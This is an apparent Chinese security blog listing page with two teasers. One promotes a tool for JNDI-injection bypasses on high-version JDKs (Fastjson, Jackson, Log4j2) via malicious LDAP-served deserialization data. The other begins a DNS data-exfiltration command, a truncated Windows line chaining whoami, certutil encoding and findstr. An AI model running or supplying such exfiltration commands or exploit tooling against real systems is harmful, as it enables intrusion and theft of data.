安全工具 工具 | FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用 前言 本工具用于解决 Fastjson、log4j2、原生JNDI注入等场景中针对高版本JDK无法加载远程恶意类,通过LDAP服务器返回原生Java反序列化数据,受害者(客户端)在具备反序列化Gadg... 05月04日131 views评论fastjson 注入漏洞 阅读全文
各种环境DNS外带回显命令 1. windows 命令行:cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr... 10月19日安全文章1,108 views评论dnslog whoami 阅读全文